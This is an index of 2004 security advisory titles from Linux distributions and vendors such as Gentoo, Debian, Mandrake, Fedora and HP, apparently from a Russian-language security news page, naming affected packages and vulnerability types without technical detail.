GLSA 200405-20: Insecure Temporary File Creation In MySQL
GLSA 200405-19: Opera telnet URI handler file creation/truncation vulnerability
GLSA 200405-16:02 : SquirrelMail
Mandrake LinuxMDKSA-2004:050: kernel
OpenPKGOpenPKG-SA-2004.025: rsync
Red HatFEDORA-2004-117 : Apache

Уведомления

Conectiva LinuxCLA-2004:843 : Fix for URI handler vulnerability and other changes
FreeBSDFreeBSD-SA-04:11.msync : FreeBSD обновил msync
Gentoo LinuxGLSA 200405-21 : Midnight Commander: Multiple vulnerabilities
GLSA 200405-23 : Gentoo Linux обновил Heimdal
HEWLETT-PACKARDHPSBUX01044 : SSRT4749 rev.0 HP-UX Java Runtime Environment (JRE) remote DoS
HPSBMA01045 : SSRT4719 rev.0 hp OpenView Select Access remote unauthorized access
SSRT4724: Hewlett-Packard : Integrated Lights Out (iLO)
Mandrake LinuxMDKSA-2004:052 : Mandrake обновил kolab-server
MDKSA-2004:051: Mandrake обновил mailman
Silicon Graphics20040506-01-U : SGI Advanced Linux Environment 3 Security Update #1
20040507-01-P: Silicon Graphics : libcpr vulnerability
SuSESuSE-SA:2003:014: SuSE обновил kdelibs/kdelibs3

Уведомления

AppleAPPLE-SA-2004-05-28: Apple обновил Mac OS X
DebianDSA 509-1: Debian обновил gatos
DSA 510-1 : Debian обновил jftpgw
DSA 511-1 : Debian обновил ethereal
Gentoo LinuxGLSA 200405-24: MPlayer, xine-lib: vulnerabilities in RTSP stream handling
GLSA 200405-25: tla: Heap-based buffer overflow in included libneon
OpenPKGOpenPK`G-SA-2004.026 : apache (option "with_mod_ssl" only)
Red HatFEDORA-2004-135: FEDORA обновил subversion
Silicon Graphics20040509-01-U : SGI Advanced Linux Environment 3 Security Update #2
20040508-01-U : SGI Advanced Linux Environment security update #20
TurboLinuxTLSA-2004-15: TurboLinux обновил cvs
TLSA-2004-16: TurboLinux обновил tcpdump
TLSA-2004-17: TurboLinux обновил apache

Уведомления

Mandrake LinuxMDKSA-2004:055: Mandrake обновил apache2
MDKSA-2004:053 : Updated xpcd package fix vulnerabilities
MDKSA-2004:054 : Mandrake обновил mod_ssl

Уведомления

DebianDSA 512-1 : New gallery packages fix unauthenticated access
DSA 499-2 : New rsync packages fix directory traversal bug
DSA 513-1 : Debian обновил log2mail
DSA 514-1 : New Linux 2.2.20 packages fix local root exploit (sparc)
DSA 515-1 : Debian обновил lha
Gentoo LinuxGLSA 200406-01 : Ethereal: Multiple security problems
GLSA 200405-25:02: Multiple vulnerabilities in included libneon
GLSA 200406-02 : tripwire: Format string vulnerability
GLSA 200406-03 : sitecopy: Multiple vulnerabilities in included libneon
Mandrake LinuxMDKSA-2004:056: Mandrake обновил krb5
NetBSD2004-008 : NetBSD : CVS server vulnerability
Red HatFLSA:1620 : Updated cvs resolves security vulnerability
FEDORA-2004-149 : Fedora Core 1 Update: krb5-1.3.3-6
FEDORA-2004-150 : Fedora Core 2 Update: krb5-1.3.3-7
Slackware LinuxSSA:2004-154-02: Slackware Linux : PHP local security issue
TrustixTSLSA-2004-0032 : buffer overflows in krb5_aname_to_localname
TSLSA-2004-0031: Trustix обновил apache

Уведомления

AppleAPPLE-SA-2004-06-07 : Security Update 2004-06-07
DebianDSA 516-1: postgresql
FreeBSDFreeBSD-SA-04:12 : Jailed processes can manipulate host routing tables
Mandrake LinuxMDKSA-2004:057 : tripwire
MicrosoftMS04-017: Vulnerability in Crystal Reports Web Viewer Could Allow Information Disclosure and Denial of Service (842689)
MS04-016: Vulnerability in DirectPlay Could Allow Denial of Service (839643)

уведомления

Gentoo LinuxGLSA 200406-04: GentooLinux Member password disclosure vulnerability
GLSA 200406-05: Apache:Buffer overflow in mod_ssl
GLSA 200406-06: CVS:additional DoS and arbitrary code execution vulnerabilities
GLSA 200406-07:Subversion: Remote heap overflow
HEWLETT-PACKARDHPSBUX01050: SSRT3456rev.0 HP-UX ftp remote unauthorized access
Mandrake LinuxMDKSA-2004:056-1:Updated krb5 packages fix buffer overflow vulnerabilities
MDKSA-2004:059: squid
MDKSA-2004:058: cvs
MDKSA-2004:060: ksymoops
OpenPKGOpenPKG-SA-2004.029:apache
OpenPKG-SA-2004.027: cvs
OpenPKG-SA-2004.028:subversion
Red HatFEDORA-2004-160:squirrelmail
FEDORA-2004-163: squid
FEDORA-2004-164: squid
FEDORA-2004-169: cvs
FEDORA-2004-170: cvs
SuSESuSE-SA:2004:015: cvs
TrustixTSLSA-2004-0033: squid

Уведомления

Gentoo LinuxGLSA 200406-09:Horde-Chora: Remote code execution
GLSA 200406-10: Gallery
GLSA 200406-11:Horde-IMP
GLSA 200406-12: Webmin:Multiple vulnerabilities
GLSA 200406-13: Squid:NTLM authentication helper buffer overflow
GLSA 200406-14: aspell:Buffer overflow in word-list-compress
HEWLETT-PACKARDHPSBTU01049 - SSRT4717:HP Tru64 UNIX SSL/TLS Potential Remote Denial of Service (DoS)
Red HatFEDORA-2004-166:subversion
FEDORA-2004-165:subversion
Silicon Graphics20040601-01-P: IRIXsyssgi system call vulnerability and other security fixes
SuSESuSE-SA:2004:017: kernel
SuSE-SA:2004:018:subversion
TrustixTSLSA-2004-0034: kernel

Уведомления

DebianDSA 521-1: New suppackages fix format string vulnerabilities
DSA 522-1: New superpackages fix format string vulnerability
Gentoo LinuxGLSA 200406-15: Usermin:Multiple vulnerabilities
Red HatFEDORA-2004-173: libpng
FEDORA-2004-174:libpng10
FEDORA-2004-175: libpng
FEDORA-2004-176:libpng10
TrustixTSL-2004-0036: kerberos5
TSLSA-2004-0035:Possible security holes in drivers
TurboLinuxTLSA-2004-18: kernelcrash

уведомления

DebianDSA 523-1: www-sql
Engarde Secure LinuxESA-20040621-005:'kernel' Several vulnerabilities

Уведомления

Gentoo LinuxGLSA 200406-16: Apache1.3: Buffer overflow in mod_proxy
GLSA 200406-17:IPsec-Tools: authentication bug in racoon
GLSA 200406-18: gzip:Insecure creation of temporary files
HEWLETT-PACKARDSSRT4741: SSRT4741 rev.0DCE for HP Tru64 UNIX Potential RPC Buffer Overrun Attack
Mandrake LinuxMDKSA-2004:062: kernel
Red HatFEDORA-2004-190: dhcp
Silicon Graphics20040603-01-U: SGIAdvanced Linux Environment 3 Security Update #3
20040602-01-U: SGIAdvanced Linux Environment 2.4 security update #21
20040604-01-U: SGIAdvanced Linux Environment 3 Security Update #4
20040605-01-U: SGIAdvanced Linux Environment 2.4 security update #22
SuSESuSE-SA:2004:019:dhcp/dhcp-server
TrustixTSL-2004-0037: libpng,mod_php4, openssl, rsync, slocate, swup

Уведомления

TrustixTSL-2004-0038 : Trustix обновил multi

Уведомления

DebianDSA 525-1: apache
Gentoo LinuxGLSA 200406-20: FreeS/WAN, Openswan, strongSwan: Vulnerabilities in certificate handling
Red HatFEDORA-2004-187: sysstat

Уведомления

Gentoo LinuxGLSA 200406-21 : mit-krb5: Multiple buffer overflows in krb5_aname_to_localname
GLSA 200406-22 : Pavuk: Remote buffer overflow
HEWLETT-PACKARDSSRT3552: HP-UX running ARPA transport local Denial of Service (DoS)
SSRT4758: HP-UX ObAM WebAdmin unauthorized access
Mandrake LinuxMDKSA-2004:063 : Mandrake обновил libpng
MDKSA-2004:065 : Mandrake обновил apache
MDKSA-2004:064 : Mandrake обновил apache2
Red HatFEDORA-2004-197 : FEDORA обновил ipsec-tools

Уведомления

FreeBSDFreeBSD-SA-04:13: Linux binary compatibility mode input validation error
Gentoo LinuxGLSA 200407-01: Esearch: Insecure temp file handling